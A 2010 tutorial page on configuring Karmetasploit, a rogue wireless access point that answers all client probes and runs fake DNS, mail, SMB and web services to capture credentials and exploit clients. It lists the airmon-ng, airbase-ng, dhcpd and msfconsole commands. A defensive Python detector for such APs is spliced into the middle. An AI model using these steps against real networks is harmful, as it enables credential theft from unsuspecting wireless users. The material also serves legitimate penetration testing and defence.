Karmetasploit

 

Project Homepage: http://www.metasploit.com/dev/trac/wiki/Karmetasploit

 

Karmetasploit is a new implementation of Dino Dai Zovi's original and excellent tool KARMA.

 

"KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host." -http://theta44.org

 

The main differences between KARMA and Karmetasploit are that Karmetasploit is not limited to hardware running the patched MadWifi drivers, and that it comes bundled with the powerful exploit framework that is Metasploit.

 

 

Prerequisites:

 

You need to have the aircrack-ng suite installed; see http://www.aircrack-ng.org/doku.php?id=install_aircrack

 

Your card must be running patched drivers that support packet injection; see http://www.aircrack-ng.org/doku.php?id=install_drivers

 

To confirm that your card now supports injection, use aircrack-ng's injection test: http://www.aircrack-ng.org/doku.php?id=injection_test

 

Karmetasploit requires a backend database to be in place before it can be used. This can be set up by running:

 

gem install activerecord sqlite3-ruby

 

 

 

Initial configuration:

 

The first thing we need to configure is a dhcpd server. For our purposes BackTrack 3's built-in dhcpd server and its configuration (/etc/dhcpd.conf) will suffice, but any native or third-party dhcpd server is equally good. We'll start it later.

 

 

 

Next we should ensure that Metasploit is installed and fully up to date:

 

cd /pentest/exploits/framework3

 

svn update

 

 

Configuring Karmetasploit:

 

First destroy all existing athx (or equivalent) interfaces:

 

wlanconfig destroy ath0  (repeat for any other virtual interfaces, e.g. ath1)

 

Now create a new monitor mode virtual interface:

 

airmon-ng start wifi0  (this creates a new monitor mode interface ath0; use iwconfig to confirm)

 

Now create the new access point:

 

modprobe tun

 

airbase-ng -P -C 30 --essid "linksys" -v ath0

 

 

-P = respond to all probes

-C 30 = enable beaconing of probed ESSID values (interval in seconds)

--essid = specify a single (initial) ESSID

-v = verbose

ath0 = our virtual monitor mode interface
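From the defender's side, the -P and -C behaviour above leaves a recognisable fingerprint: one BSSID that answers probe requests for many unrelated SSIDs, or that starts beaconing exactly the SSIDs nearby clients have just probed for. The following Python is an added detection example, not code from this page or the Karmetasploit project; the frame records and MAC addresses are constructed sample data, and the record format (type, transmitter MAC, SSID) is an assumption you would adapt to your capture tool.

```python
"""Flag KARMA-style rogue APs from simplified 802.11 management-frame records.

A legitimate AP advertises a small, fixed set of SSIDs. An AP run with
airbase-ng -P answers probe requests for any SSID, and with -C it also
beacons every SSID a client probed for, so one BSSID advertising many
distinct SSIDs, or echoing back everything clients asked for, stands out.
"""
from collections import defaultdict

# Constructed sample frames (frame type, transmitter MAC, SSID); not a real capture.
FRAMES = [
    ("probe_req",  "aa:aa:aa:aa:aa:01", "Honeypot"),
    ("probe_req",  "aa:aa:aa:aa:aa:01", "linksys"),
    ("probe_req",  "aa:aa:aa:aa:aa:02", "CoffeeShopWiFi"),
    ("probe_resp", "00:11:22:33:44:55", "Honeypot"),        # rogue answers all
    ("probe_resp", "00:11:22:33:44:55", "linksys"),
    ("probe_resp", "00:11:22:33:44:55", "CoffeeShopWiFi"),
    ("beacon",     "00:11:22:33:44:55", "linksys"),         # -C style beaconing
    ("beacon",     "00:11:22:33:44:55", "Honeypot"),
    ("beacon",     "66:77:88:99:aa:bb", "OfficeNet"),       # normal AP
    ("probe_resp", "66:77:88:99:aa:bb", "OfficeNet"),
]


def find_karma_like_aps(frames, max_ssids=2):
    """Return {bssid: sorted SSIDs} for every AP that advertises more than
    max_ssids distinct SSIDs, or that answered every SSID any client probed for.
    Raise max_ssids for sites with legitimate multi-SSID enterprise APs."""
    probed = set()                 # SSIDs clients asked for
    advertised = defaultdict(set)  # BSSID -> SSIDs it beaconed or answered with
    for ftype, mac, ssid in frames:
        if ftype == "probe_req":
            probed.add(ssid)
        elif ftype in ("probe_resp", "beacon"):
            advertised[mac].add(ssid)
    suspects = {}
    for bssid, ssids in advertised.items():
        if len(ssids) > max_ssids or (probed and probed <= ssids):
            suspects[bssid] = sorted(ssids)
    return suspects


if __name__ == "__main__":
    for bssid, ssids in find_karma_like_aps(FRAMES).items():
        print(f"suspect rogue AP {bssid}: advertises {', '.join(ssids)}")
```

In a real deployment the probe-request set should be kept per time window, since the tell-tale sign is an AP answering for SSIDs shortly after clients probe for them.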

 

 

Start-up karmetasploit:

 

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

 

dhcpd -cf /etc/dhcpd.conf at0

 

cd /pentest/exploits/framework3

 

./msfconsole -r karma.rc

 

 

New Client connection:

 

As you can see below, we now have a client connected to our rogue access point; it was initially probing for the SSIDs Honeypot and linksys:

 

 

 

Karmetasploit black holing HTTP requests:

 

 

 

"Karmetasploit includes a DNS daemon that responds to all requests, a POP3 service, an IMAP4 service, a SMTP service, a FTP service, a couple of different SMB services, and most importantly, a web service." -Karmetasploit Homepage


 

© Copyright 2010 Wirelessdefence.org. All Rights Reserved.